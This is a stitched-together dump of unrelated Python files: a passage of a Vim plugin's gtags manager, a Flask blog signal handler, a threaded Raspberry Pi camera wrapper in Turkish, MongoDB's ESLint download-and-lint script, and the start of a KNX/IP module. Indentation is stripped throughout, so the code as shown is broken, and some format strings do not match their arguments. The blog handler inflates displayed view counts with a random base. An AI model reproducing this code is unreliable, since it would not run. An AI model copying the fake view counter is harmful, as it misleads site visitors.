redir_err = " 2>/dev/null"
if self._Lf_ShowHidden:
show_hidden = ""
else:
show_hidden = '-name ".*" -prune -o'
cmd = 'find %s "%s" -name "." -o %s %s %s -type f -print %s %s' % (followlinks,
dir,
ignore_dir,
ignore_file,
show_hidden,
redir_err)
else:
cmd = None
return cmd
def _file_list_cmd(self, root):
if self._Lf_GtagsSource == 1:
cmd = self._buildCmd(root)
elif self._Lf_GtagsSource == 2:
if os.path.exists(os.path.join(root, ".git")) and os.path.isdir(os.path.join(root, ".git")):
cmd = self._Lf_GtagsfilesCmd[".git"]
elif os.path.exists(os.path.join(root, ".hg")) and os.path.isdir(os.path.join(root, ".hg")):
cmd = self._Lf_GtagsfilesCmd[".hg"]
else:
cmd = self._Lf_GtagsfilesCmd["default"]
else:
cmd = None
return cmd
def _executeCmd(self, root, dbpath):
if not os.path.exists(dbpath):
os.makedirs(dbpath)
cmd = self._file_list_cmd(root)
if cmd:
if os.name == 'nt':
cmd = 'cd {}"{}" && ( {} ) | gtags -i {}{}{}{}--gtagslabel {} -f- "{}"'.format(self._cd_option, root, cmd,
self._accept_dotfiles, self._skip_unreadable, self._skip_symlink,
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, dbpath)
else:
cmd = 'cd {}"{}" && {{ {}; }} | gtags -i {}{}{}{}--gtagslabel {} -f- "{}"'.format(self._cd_option, root, cmd,
self._accept_dotfiles, self._skip_unreadable, self._skip_symlink,
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, dbpath)
else:
cmd = 'cd {}"{}" && gtags -i {}{}{}{}--gtagslabel {} "{}"'.format(self._cd_option, root,
self._accept_dotfiles, self._skip_unreadable, self._skip_symlink,
'--gtagsconf %s ' % self._gtagsconf if self._gtagsconf else "",
self._gtagslabel, dbpath)
env = os.environ
# env["GTAGSFORCECPP"] = "" # lead to issue #489
proc = subprocess.Popen(cmd, shell=True, universal_newlines=True, stderr=subprocess.PIPE, env=env)
_, error = proc.communicate()
def print_log(args):
print(args)
if error:
if self._has_nvim:
vim.async_call(print_log, cmd)
vim.async_call(print_log, error)
vim.async_call(print_log, "gtags error!")
else:
print(cmd)
print(error)
print("gtags error!")
else:
if self._has_nvim:
vim.async_call(print_log, "gtags generated successfully!")
else:
print("gtags generated successfully!")
if self._has_nvim:
vim.async_call(lfCmd, "let g:Lf_Debug_GtagsCmd = '%s'" % escQuote(cmd))
# else:
# lfCmd("let g:Lf_Debug_GtagsCmd = '%s'" % escQuote(cmd)) # may cause crash
def getStlCategory(self):
return 'Gtags'
def getStlCurDir(self):
return escQuote(lfEncode(os.getcwd()))
def cleanup(self):
for exe in self._executor:
exe.killProcess()
self._executor = []
def getPatternRegex(self):
return self._pattern_regex
def getResultFormat(self):
return self._result_format
def getLastResultFormat(self):
return self._last_result_format
#*****************************************************
# GtagsExplManager
#*****************************************************
class GtagsExplManager(Manager):
def __init__(self):
super(GtagsExplManager, self).__init__()
self._match_path = False
def _getExplClass(self):
return GtagsExplorer
def _defineMaps(self):
lfCmd("call leaderf#Gtags#Maps()")
def _acceptSelection(self, *args, **kwargs):
if len(args) == 0:
return
line = args[0]
if self._getExplorer().getResultFormat() is None:
file, line_num = line.split('\t', 2)[:2]
elif self._getExplorer().getResultFormat() == "ctags":
file, line_num = line.split('\t', 2)[1:]
elif self._getExplorer().getResultFormat() == "ctags-x":
line_num, file = line.split(None, 3)[1:3]
else: # ctags-mod
file, line_num = line.split('\t', 2)[:2]
if not os.path.isabs(file):
file = os.path.join(self._getInstance().getCwd(), lfDecode(file))
file = os.path.normpath(lfEncode(file))
try:
if kwargs.get("mode", '') == 't':
if lfEval("get(g:, 'Lf_JumpToExistingWindow', 1)") == '1':
lfCmd("tab drop %s" % (escSpecial(file), line_num))
else:
lfCmd("tabe %s" % (escSpecial(file), line_num))
else:
if lfEval("get(g:, 'Lf_JumpToExistingWindow', 1)") == '1' and lfEval("bufexists('%s')" % escQuote(file)) == '1':
lfCmd("keepj hide drop %s | %s" % (escSpecial(file), line_num))
else:
lfCmd("hide edit +%s %s" % (line_num, escSpecial(file)))
lfCmd("norm! ^zv")
lfCmd("norm! zz")
if vim.current.window not in self._cursorline_dict:
self._cursorline_dict[vim.current.window] = vim.current.window.options["cursorline"]
lfCmd("setlocal cursorline")
except vim.error as e:
lfPrintError(e)
def updateGtags(self, filename, single_update, auto=True):
self._getExplorer().updateGtags(filename, single_update, auto)
def setArguments(self, arguments):
self._arguments = arguments
self._match_path = "--match-path" in arguments
def _getDigest(self, line, mode):
"""
specify what part in the line to be processed and highlighted
Args:
mode: 0, return the full path
1, return the name only
2, return the directory name
"""
if self._getExplorer().getResultFormat() in [None, "ctags-mod"]:
if self._match_path:
return line
if mode == 2:
return line[:line.find('\t')]
else:
return line[line.find('\t', line.find('\t')) + 1:]
elif self._getExplorer().getResultFormat() == "ctags":
if mode == 2:
return line[line.find('\t')+1:]
else:
return line[:line.find('\t')]
elif self._getExplorer().getResultFormat() == "ctags-x":
if mode == 2:
return line[line.find(' ') + 1:]
else:
return line[:line.find(' ')]
else:
return line
def _getDigestStartPos(self, line, mode):
"""
return the start position of the digest returned by _getDigest()
Args:
mode: 0, return the start postion of full path
1, return the start postion of name only
2, return the start postion of directory name
"""
if self._getExplorer().getResultFormat() in [None, "ctags-mod"]:
if self._match_path or mode == 2:
return 0
return lfBytesLen(line[:line.find('\t', line.find('\t'))]) + 1
elif self._getExplorer().getResultFormat() == "ctags":
if mode == 2:
return lfBytesLen(line[:line.find('\t')]) + 1
else:
return 0
elif self._getExplorer().getResultFormat() == "ctags-x":
if mode == 2:
return lfBytesLen(line[:line.find(' ')]) + 1
else:
return 0
else:
return 0
def _createHelp(self):
help = []
help.append('" <CR>/<double-click>/o : open file under cursor')
help.append('" x : open file under cursor in a horizontally split window')
help.append('" v : open file under cursor in a vertically split window')
help.append('" t : open file under cursor in a new tabpage')
help.append('" p : preview the result')
help.append('" d : delete the line under the cursor')
help.append('" i/<Tab> : switch to input mode')
help.append('" q : quit')
help.append('" <F1> : toggle this help')
help.append('" ---------------------------------------------------------')
return help
def _afterEnter(self):
super(GtagsExplManager, self)._afterEnter()
lfCmd("augroup Lf_Gtags")
lfCmd("autocmd!")
lfCmd("autocmd VimLeavePre * call leaderf#Gtags#cleanup()")
lfCmd("augroup END")
if self._getInstance().getWinPos() == 'popup':
if self._getExplorer().getResultFormat() is None:
# \ should be escaped as \\\\
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsFileName', '^.\\\\{-}\\\\ze\\\\t')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsLineNumber', '\\\\t\\\\zs\\\\d\\\\+\\\\ze\\\\t')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
elif self._getExplorer().getResultFormat() == "ctags":
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsFileName', '\\\\t\\\\zs.\\\\{-}\\\\ze\\\\t')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsLineNumber', '\\\\t\\\\zs\\\\d\\\\+$')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
elif self._getExplorer().getResultFormat() == "ctags-x":
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsFileName', '^\\\\S\\\\+\\\\s\\\\+\\\\d\\\\+\\\\s\\\\+\\\\zs\\\\S\\\\+')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsLineNumber', '^\\\\S\\\\+\\\\s\\\\+\\\\zs\\\\d\\\\+')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
else: # ctags-mod
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsFileName', '^.\\\\{-}\\\\ze\\\\t')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsLineNumber', '\\\\t\\\\zs\\\\d\\\\+\\\\ze\\\\t')")"""
% self._getInstance().getPopupWinId())
id = int(lfEval("matchid"))
self._match_ids.append(id)
try:
for i in self._getExplorer().getPatternRegex():
lfCmd("""call win_execute(%d, "let matchid = matchadd('Lf_hl_gtagsHighlight', '%s', 9)")"""
% (self._getInstance().getPopupWinId(), escQuote(i).replace('\\', '\\\\')))
id = int(lfEval("matchid"))
self._match_ids.append(id)
except vim.error:
pass
else:
if self._getExplorer().getResultFormat() is None:
id = int(lfEval("""matchadd('Lf_hl_gtagsFileName', '^.\{-}\ze\t')"""))
self._match_ids.append(id)
id = int(lfEval("""matchadd('Lf_hl_gtagsLineNumber', '\t\zs\d\+\ze\t')"""))
self._match_ids.append(id)
elif self._getExplorer().getResultFormat() == "ctags":
id = int(lfEval("""matchadd('Lf_hl_gtagsFileName', '\t\zs.\{-}\ze\t')"""))
self._match_ids.append(id)
id = int(lfEval("""matchadd('Lf_hl_gtagsLineNumber', '\t\zs\d\+$')"""))
self._match_ids.append(id)
elif self._getExplorer().getResultFormat() == "ctags-x":
id = int(lfEval("""matchadd('Lf_hl_gtagsFileName', '^\S\+\s\+\d\+\s\+\zs\S\+')"""))
self._match_ids.append(id)
id = int(lfEval("""matchadd('Lf_hl_gtagsLineNumber', '^\S\+\s\+\zs\d\+')"""))
self._match_ids.append(id)
else: # ctags-mod
id = int(lfEval("""matchadd('Lf_hl_gtagsFileName', '^.\{-}\ze\t')"""))
self._match_ids.append(id)
id = int(lfEval("""matchadd('Lf_hl_gtagsLineNumber', '\t\zs\d\+\ze\t')"""))
self._match_ids.append(id)
try:
for i in self._getExplorer().getPatternRegex():
id = int(lfEval("matchadd('Lf_hl_gtagsHighlight', '%s', 9)" % escQuote(i)))
self._match_ids.append(id)
except vim.error:
pass
def _beforeExit(self):
super(GtagsExplManager, self)._beforeExit()
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
for k, v in self._cursorline_dict.items():
if k.valid:
k.options["cursorline"] = v
self._cursorline_dict.clear()
def _bangEnter(self):
super(GtagsExplManager, self)._bangEnter()
if lfEval("exists('*timer_start')") == '0':
lfCmd("echohl Error | redraw | echo ' E117: Unknown function: timer_start' | echohl NONE")
return
if "--recall" not in self._arguments:
self._workInIdle(bang=True)
if self._read_finished < 2:
self._timer_id = lfEval("timer_start(1, 'leaderf#Gtags#TimerCallback', {'repeat': -1})")
else:
instance = self._getInstance()
if instance.isLastReverseOrder():
instance.window.cursor = (min(instance.cursorRow, len(instance.buffer)), 0)
else:
instance.window.cursor = (max(instance.cursorRow - instance.helpLength, 1), 0)
if instance.getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal cursorline')" % instance.getPopupWinId())
elif instance.getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % instance.getPopupWinId())
else:
instance.window.options["cursorline"] = True
def deleteCurrentLine(self):
instance = self._getInstance()
if self._inHelpLines():
return
if instance.getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal modifiable')" % instance.getPopupWinId())
else:
lfCmd("setlocal modifiable")
line = instance._buffer_object[instance.window.cursor[0] - 1]
if len(self._content) > 0:
self._content.remove(line)
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlResultsCount(len(self._content)//self._getUnit())
# `del vim.current.line` does not work in neovim
# https://github.com/neovim/neovim/issues/9361
del instance._buffer_object[instance.window.cursor[0] - 1]
if instance.getWinPos() == 'popup':
instance.refreshPopupStatusline()
lfCmd("call win_execute(%d, 'setlocal nomodifiable')" % instance.getPopupWinId())
else:
lfCmd("setlocal nomodifiable")
def getArguments(self):
if self._getExplorer().getLastResultFormat() is not None and \
"--append" in self._arguments:
del self._arguments["--append"]
return self._arguments
def _supportsRefine(self):
return True
def startExplorer(self, win_pos, *args, **kwargs):
if "through" in kwargs.get("arguments", {}).get("--path-style", []):
self._orig_cwd = os.getcwd()
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
if vim.current.buffer.name:
path = os.path.dirname(lfDecode(vim.current.buffer.name))
else:
path = os.getcwd()
root_markers = lfEval("g:Lf_RootMarkers")
project_root = self._getExplorer()._nearestAncestor(root_markers, path)
if project_root == "" and path != os.getcwd():
project_root = self._getExplorer()._nearestAncestor(root_markers, os.getcwd())
if project_root:
chdir(project_root)
super(GtagsExplManager, self).startExplorer(win_pos, *args, **kwargs)
def _previewInPopup(self, *args, **kwargs):
if len(args) == 0:
return
line = args[0]
if self._getExplorer().getResultFormat() is None:
file, line_num = line.split('\t', 2)[:2]
elif self._getExplorer().getResultFormat() == "ctags":
file, line_num = line.split('\t', 2)[1:]
elif self._getExplorer().getResultFormat() == "ctags-x":
line_num, file = line.split(None, 3)[1:3]
else: # ctags-mod
file, line_num = line.split('\t', 2)[:2]
if not os.path.isabs(file):
file = os.path.join(self._getInstance().getCwd(), lfDecode(file))
file = os.path.normpath(lfEncode(file))
buf_number = lfEval("bufadd('{}')".format(escQuote(file)))
self._createPopupPreview("", buf_number, line_num)
#*****************************************************
# gtagsExplManager is a singleton
#*****************************************************
gtagsExplManager = GtagsExplManager()
__all__ = ['gtagsExplManager']
|
signals.py
|
from threading import Thread
from blinker import Namespace
from flask import request, url_for
from mongoengine import DoesNotExist
from .models import Tracker, PostStatistic
from .settings import BlogSettings
from .utils import submit_url_to_baidu
# 创建信号
app_signals = Namespace()
post_visited = app_signals.signal('post-visited')
post_published = app_signals.signal('post-published')
# 创建信号订阅者
@post_visited.connect
def on_post_visited(sender, post, **kwargs):
"""更新文章统计数据与浏览记录
文章被浏览后,获取浏览者信息并更新文章统计数据
"""
tracker = Tracker(post=post)
# 获取请求来源ip与用户代理
proxy_list = request.headers.getlist('X-Forwarded-For')
tracker.ip = proxy_list[0] if proxy_list else request.remote_addr
tracker.user_agent = request.headers.get('User-Agent')
tracker.save()
# 获取该文章的统计数据,若不存在则创建并初始化
try:
post_statistic = PostStatistic.objects.get(post=post)
except DoesNotExist:
post_statistic = PostStatistic(post=post, post_type=post.type)
from random import randint
post_statistic.verbose_count_base = randint(500, 5000)
post_statistic.save()
post_statistic.modify(inc__visit_count=1)
@post_published.connect
def on_post_published(sender, post):
"""对文章进行SEO优化
文章发布后,将链接地址提交到百度站长平台,以被收录进搜索结果
"""
# post_type = post.type
# endpoints = {
# 'post': 'blog.show_post',
# 'page': 'blog.show_page'
# }
# post_url = url_for(endpoints[post_type], slug=post.slug, _external=True)
# baidu_url = BlogSettings.SEARCH_ENGINE_SUBMIT_URLS['baidu']
# if baidu_url:
# # 异步发送网络请求
# thr = Thread(target=submit_url_to_baidu, args=(baidu_url, post_url))
# thr.start()
# return thr
# else:
# print('Not ready to submit urls yet')
|
HizlandirilmisPiKamera.py
|
from picamera import PiCamera
from picamera.array import PiRGBArray
from threading import Thread
import cv2
class HizlandirilmisPiKamera:
def __init__(self, cozunurluk=(640, 480)):
self.camera = PiCamera()
self.camera.resolution = cozunurluk
self.hamKare = PiRGBArray(self.camera, size=self.camera.resolution)
self.yayin = self.camera.capture_continuous(self.hamKare, format="bgr", use_video_port=True)
self.suAnkiKare = None
self.penceredeGosterilecekler = dict()
self.kameraGostermeAktif = False
def veriOkumayaBasla(self):
Thread(target=self.__veriGuncelle__, args=()).start()
return self
def __veriGuncelle__(self):
for f in self.yayin:
self.suAnkiKare = f.array
self.hamKare.truncate(0)
def veriOku(self):
return self.suAnkiKare
def kareyiGoster(self, pencereninIsmi="frame", gosterilecekGoruntu=None):
if gosterilecekGoruntu is None:
self.penceredeGosterilecekler[pencereninIsmi] = self.suAnkiKare
else:
self.penceredeGosterilecekler[pencereninIsmi] = gosterilecekGoruntu
if not self.kameraGostermeAktif:
Thread(target=self.__kareyiGostermeyiGuncelle__, args=()).start()
def __kareyiGostermeyiGuncelle__(self):
self.kameraGostermeAktif = True
while True:
for isim in self.penceredeGosterilecekler.copy():
cv2.imshow(isim, self.penceredeGosterilecekler[isim])
key = cv2.waitKey(1)
if key == ord("q"):
cv2.destroyAllWindows()
break
|
eslint.py
|
#!/usr/bin/env python
"""
eslint.py
Will download a prebuilt ESLint binary if necessary (i.e. it isn't installed, isn't in the current
path, or is the wrong version). It works in much the same way as clang_format.py. In lint mode, it
will lint the files or directory paths passed. In lint-patch mode, for upload.py, it will see if
there are any candidate files in the supplied patch. Fix mode will run ESLint with the --fix
option, and that will update the files with missing semicolons and similar repairable issues.
There is also a -d mode that assumes you only want to run one copy of ESLint per file / directory
parameter supplied. This lets ESLint search for candidate files to lint.
"""
import Queue
import itertools
import os
import re
import shutil
import string
import subprocess
import sys
import tarfile
import tempfile
import threading
import time
import urllib
from distutils import spawn
from multiprocessing import cpu_count
from optparse import OptionParser
# Get relative imports to work when the package is not installed on the PYTHONPATH.
if __name__ == "__main__" and __package__ is None:
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(os.path.realpath(__file__)))))
from buildscripts.resmokelib.utils import globstar
from buildscripts import moduleconfig
##############################################################################
#
# Constants for ESLint
#
#
# Expected version of ESLint.
ESLINT_VERSION = "2.3.0"
# Name of ESLint as a binary.
ESLINT_PROGNAME = "eslint"
# URL location of our provided ESLint binaries.
ESLINT_HTTP_LINUX_CACHE = "https://s3.amazonaws.com/boxes.10gen.com/build/eslint-" + \
ESLINT_VERSION + "-linux.tar.gz"
ESLINT_HTTP_DARWIN_CACHE = "https://s3.amazonaws.com/boxes.10gen.com/build/eslint-" + \
ESLINT_VERSION + "-darwin.tar.gz"
# Path in the tarball to the ESLint binary.
ESLINT_SOURCE_TAR_BASE = string.Template(ESLINT_PROGNAME + "-$platform-$arch")
# Path to the modules in the mongodb source tree.
# Has to match the string in SConstruct.
MODULE_DIR = "src/mongo/db/modules"
# Copied from python 2.7 version of subprocess.py
# Exception classes used by this module.
class CalledProcessError(Exception):
"""This exception is raised when a process run by check_call() or
check_output() returns a non-zero exit status.
The exit status will be stored in the returncode attribute;
check_output() will also store the output in the output attribute.
"""
def __init__(self, returncode, cmd, output=None):
self.returncode = returncode
self.cmd = cmd
self.output = output
def __str__(self):
return ("Command '%s' returned non-zero exit status %d with output %s" %
(self.cmd, self.returncode, self.output))
# Copied from python 2.7 version of subprocess.py
def check_output(*popenargs, **kwargs):
r"""Run command with arguments and return its output as a byte string.
If the exit code was non-zero it raises a CalledProcessError. The
CalledProcessError object will have the return code in the returncode
attribute and output in the output attribute.
The arguments are the same as for the Popen constructor. Example:
>>> check_output(["ls", "-l", "/dev/null"])
'crw-rw-rw- 1 root root 1, 3 Oct 18 2007 /dev/null\n'
The stdout argument is not allowed as it is used internally.
To capture standard error in the result, use stderr=STDOUT.
>>> check_output(["/bin/sh", "-c",
... "ls -l non_existent_file ; exit 0"],
... stderr=STDOUT)
'ls: non_existent_file: No such file or directory\n'
"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise CalledProcessError(retcode, cmd, output)
return output
def callo(args):
"""Call a program, and capture its output
"""
return check_output(args)
def extract_eslint(tar_path, target_file):
tarfp = tarfile.open(tar_path)
for name in tarfp.getnames():
if name == target_file:
tarfp.extract(name)
tarfp.close()
def get_eslint_from_cache(dest_file, platform, arch):
"""Get ESLint binary from mongodb's cache
"""
# Get URL
if platform == "Linux":
url = ESLINT_HTTP_LINUX_CACHE
elif platform == "Darwin":
url = ESLINT_HTTP_DARWIN_CACHE
else:
raise ValueError('ESLint is not available as a binary for ' + platform)
dest_dir = tempfile.gettempdir()
temp_tar_file = os.path.join(dest_dir, "temp.tar.gz")
# Download the file
print("Downloading ESLint %s from %s, saving to %s" % (ESLINT_VERSION,
url, temp_tar_file))
urllib.urlretrieve(url, temp_tar_file)
eslint_distfile = ESLINT_SOURCE_TAR_BASE.substitute(platform=platform, arch=arch)
extract_eslint(temp_tar_file, eslint_distfile)
shutil.move(eslint_distfile, dest_file)
class ESLint(object):
"""Class encapsulates finding a suitable copy of ESLint, and linting an individual file
"""
def __init__(self, path, cache_dir):
eslint_progname = ESLINT_PROGNAME
# Initialize ESLint configuration information
if sys.platform.startswith("linux"):
self.arch = "x86_64"
self.tar_path = None
elif sys.platform == "darwin":
self.arch = "x86_64"
self.tar_path = None
self.path = None
# Find ESLint now
if path is not None:
if os.path.isfile(path):
self.path = path
else:
print("WARNING: Could not find ESLint at %s" % (path))
# Check the environment variable
if "MONGO_ESLINT" in os.environ:
self.path = os.environ["MONGO_ESLINT"]
if self.path and not self._validate_version(warn=True):
self.path = None
# Check the user's PATH environment variable now
if self.path is None:
self.path = spawn.find_executable(eslint_progname)
if self.path and not self._validate_version(warn=True):
self.path = None
# Have not found it yet, download it from the web
if self.path is None:
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
self.path = os.path.join(cache_dir, eslint_progname)
if not os.path.isfile(self.path):
if sys.platform.startswith("linux"):
get_eslint_from_cache(self.path, "Linux", self.arch)
elif sys.platform == "darwin":
get_eslint_from_cache(self.path, "Darwin", self.arch)
else:
print("ERROR: eslint.py does not support downloading ESLint " +
"on this platform, please install ESLint " + ESLINT_VERSION)
# Validate we have the correct version
if not self._validate_version():
raise ValueError('correct version of ESLint was not found.')
self.print_lock = threading.Lock()
def _validate_version(self, warn=False):
"""Validate ESLint is the expected version
"""
esl_version = callo([self.path, "--version"]).rstrip()
# Ignore the leading v in the version string.
if ESLINT_VERSION == esl_version[1:]:
return True
if warn:
print("WARNING: eslint found in path, but incorrect version found at " +
self.path + " with version: " + esl_version)
return False
def _lint(self, file_name, print_diff):
"""Check the specified file for linting errors
"""
# ESLint returns non-zero on a linting error. That's all we care about
# so only enter the printing logic if we have an error.
try:
eslint_output = callo([self.path, "-f", "unix", file_name])
except CalledProcessError as e:
if print_diff:
# Take a lock to ensure error messages do not get mixed when printed to the screen
with self.print_lock:
print("ERROR: ESLint found errors in " + file_name)
print(e.output)
return False
except:
print("ERROR: ESLint process threw unexpected error", sys.exc_info()[0])
return False
return True
def lint(self, file_name):
"""Check the specified file has no linting errors
"""
return self._lint(file_name, print_diff=True)
def autofix(self, file_name):
""" Run ESLint in fix mode.
"""
return not subprocess.call([self.path, "--fix", file_name])
def parallel_process(items, func):
"""Run a set of work items to completion
"""
try:
cpus = cpu_count()
except NotImplementedError:
cpus = 1
task_queue = Queue.Queue()
# Use a list so that worker function will capture this variable
pp_event = threading.Event()
pp_result = [True]
pp_lock = threading.Lock()
def worker():
"""Worker thread to process work items in parallel
"""
while not pp_event.is_set():
try:
item = task_queue.get_nowait()
except Queue.Empty:
# if the queue is empty, exit the worker thread
pp_event.set()
return
try:
ret = func(item)
finally:
# Tell the queue we finished with the item
task_queue.task_done()
# Return early if we fail, and signal we are done
if not ret:
with pp_lock:
pp_result[0] = False
pp_event.set()
return
# Enqueue all the work we want to process
for item in items:
task_queue.put(item)
# Process all the work
threads = []
for cpu in range(cpus):
thread = threading.Thread(target=worker)
thread.daemon = True
thread.start()
threads.append(thread)
# Wait for the threads to finish
# Loop with a timeout so that we can process Ctrl-C interrupts
# Note: On Python 2.6 wait always returns None so we check is_set also,
# This works because we only set the event once, and never reset it
while not pp_event.wait(1) and not pp_event.is_set():
time.sleep(1)
for thread in threads:
thread.join()
return pp_result[0]
def get_base_dir():
"""Get the base directory for mongo repo.
This script assumes that it is running in buildscripts/, and uses
that to find the base directory.
"""
try:
return subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).rstrip()
except:
# We are not in a valid git directory. Use the script path instead.
return os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
def get_repos():
"""Get a list of linked repos and directories to run ESLint on.
"""
base_dir = get_base_dir()
# Get a list of modules
# TODO: how do we filter rocks, does it matter?
mongo_modules = moduleconfig.discover_module_directories(
os.path.join(base_dir, MODULE_DIR), None)
paths = [os.path.join(base_dir, MODULE_DIR, m) for m in mongo_modules]
paths.append(base_dir)
return [Repo(p) for p in paths]
class Repo(object):
"""Class encapsulates all knowledge about a git repository, and its metadata
to run ESLint.
"""
def __init__(self, path):
self.path = path
# Get candidate files
self.candidate_files = self.get_candidate_files()
self.root = self._get_root()
def _callgito(self, args):
"""Call git for this repository
"""
# These two flags are the equivalent of -C in newer versions of Git
# but we use these to support versions back to ~1.8
return callo(['git', '--git-dir', os.path.join(self.path, ".git"),
'--work-tree', self.path] + args)
def _get_local_dir(self, path):
"""Get a directory path relative to the git root directory
"""
if os.path.isabs(path):
return os.path.relpath(path, self.root)
return path
def get_candidates(self, candidates):
"""Get the set of candidate files to check by doing an intersection
between the input list, and the list of candidates in the repository
Returns the full path to the files for ESLint to consume.
"""
# NOTE: Files may have an absolute root (i.e. leading /)
if candidates is not None and len(candidates) > 0:
candidates = [self._get_local_dir(f) for f in candidates]
valid_files = list(set(candidates).intersection(self.get_candidate_files()))
else:
valid_files = list(self.get_candidate_files())
# Get the full file names here
valid_files = [os.path.normpath(os.path.join(self.root, f)) for f in valid_files]
return valid_files
def _get_root(self):
"""Gets the root directory for this repository from git
"""
gito = self._callgito(['rev-parse', '--show-toplevel'])
return gito.rstrip()
def get_candidate_files(self):
"""Query git to get a list of all files in the repo to consider for analysis
"""
gito = self._callgito(["ls-files"])
# This allows us to pick all the interesting files
# in the mongo and mongo-enterprise repos
file_list = [line.rstrip()
for line in gito.splitlines()
if "src/mongo" in line or "jstests" in line]
files_match = re.compile('\\.js$')
file_list = [a for a in file_list if files_match.search(a)]
return file_list
def expand_file_string(glob_pattern):
"""Expand a string that represents a set of files
"""
return [os.path.abspath(f) for f in globstar.iglob(glob_pattern)]
def get_files_to_check(files):
"""Filter the specified list of files to check down to the actual
list of files that need to be checked."""
candidates = []
# Get a list of candidate_files
candidates = [expand_file_string(f) for f in files]
candidates = list(itertools.chain.from_iterable(candidates))
repos = get_repos()
valid_files = list(itertools.chain.from_iterable([r.get_candidates(candidates) for r in repos]))
return valid_files
def get_files_to_check_from_patch(patches):
"""Take a patch file generated by git diff, and scan the patch for a list of files to check.
"""
candidates = []
# Get a list of candidate_files
check = re.compile(r"^diff --git a\/([\w\/\.\-]+) b\/[\w\/\.\-]+")
lines = []
for patch in patches:
with open(patch, "rb") as infile:
lines += infile.readlines()
candidates = [check.match(line).group(1) for line in lines if check.match(line)]
repos = get_repos()
valid_files = list(itertools.chain.from_iterable([r.get_candidates(candidates) for r in repos]))
return valid_files
def _get_build_dir():
"""Get the location of the scons build directory in case we need to download ESLint
"""
return os.path.join(get_base_dir(), "build")
def _lint_files(eslint, files):
"""Lint a list of files with ESLint
"""
eslint = ESLint(eslint, _get_build_dir())
lint_clean = parallel_process([os.path.abspath(f) for f in files], eslint.lint)
if not lint_clean:
print("ERROR: ESLint found errors. Run ESLint manually to see errors in "\
"files that were skipped")
sys.exit(1)
return True
def lint_patch(eslint, infile):
"""Lint patch command entry point
"""
files = get_files_to_check_from_patch(infile)
# Patch may have files that we do not want to check which is fine
if files:
return _lint_files(eslint, files)
return True
def lint(eslint, dirmode, glob):
"""Lint files command entry point
"""
if dirmode and glob:
files = glob
else:
files = get_files_to_check(glob)
_lint_files(eslint, files)
return True
def _autofix_files(eslint, files):
"""Auto-fix the specified files with ESLint.
"""
eslint = ESLint(eslint, _get_build_dir())
autofix_clean = parallel_process([os.path.abspath(f) for f in files], eslint.autofix)
if not autofix_clean:
print("ERROR: failed to auto-fix files")
return False
def autofix_func(eslint, dirmode, glob):
"""Auto-fix files command entry point
"""
if dirmode:
files = glob
else:
files = get_files_to_check(glob)
return _autofix_files(eslint, files)
def main():
"""Main entry point
"""
success = False
usage = "%prog [-e <eslint>] [-d] lint|lint-patch|fix [glob patterns] "
description = "lint runs ESLint on provided patterns or all .js files under jstests/ "\
"and src/mongo. lint-patch runs ESLint against .js files modified in the "\
"provided patch file (for upload.py). "\
"fix runs ESLint with --fix on provided patterns "\
"or files under jstests/ and src/mongo."
epilog ="*Unless you specify -d a separate ESLint process will be launched for every file"
parser = OptionParser()
parser = OptionParser(usage=usage, description=description, epilog=epilog)
parser.add_option("-e", "--eslint", type="string", dest="eslint",
help="Fully qualified path to eslint executable",)
parser.add_option("-d", "--dirmode", action="store_true", default=True, dest="dirmode",
help="Considers the glob patterns as directories and runs ESLint process " \
"against each pattern",)
(options, args) = parser.parse_args(args=sys.argv)
if len(args) > 1:
command = args[1]
searchlist = args[2:]
if not searchlist:
searchlist = ["jstests/", "src/mongo/"]
if command == "lint":
success = lint(options.eslint, options.dirmode, searchlist)
elif command == "lint-patch":
if not args[2:]:
success = False
print("You must provide the patch's fully qualified file name with lint-patch")
else:
success = lint_patch(options.eslint, searchlist)
elif command == "fix":
success = autofix_func(options.eslint, options.dirmode, searchlist)
else:
parser.print_help()
else:
parser.print_help()
sys.exit(0 if success else 1)
if __name__ == "__main__":
main()
|
ip.py
|
"""Module to connect to a KNX bus using a KNX/IP tunnelling interface.
"""
import socket
import threading
import logging
import time
import queue as queue
import socketserver as SocketServer
from knxip.core import KNXException, ValueCache, E_NO_ERROR
from knxip.helper import int_to_array, ip_to_array
from knxip.gatewayscanner import GatewayScanner
class KNXIPFrame():
"""Representation of a KNX/IP frame."""
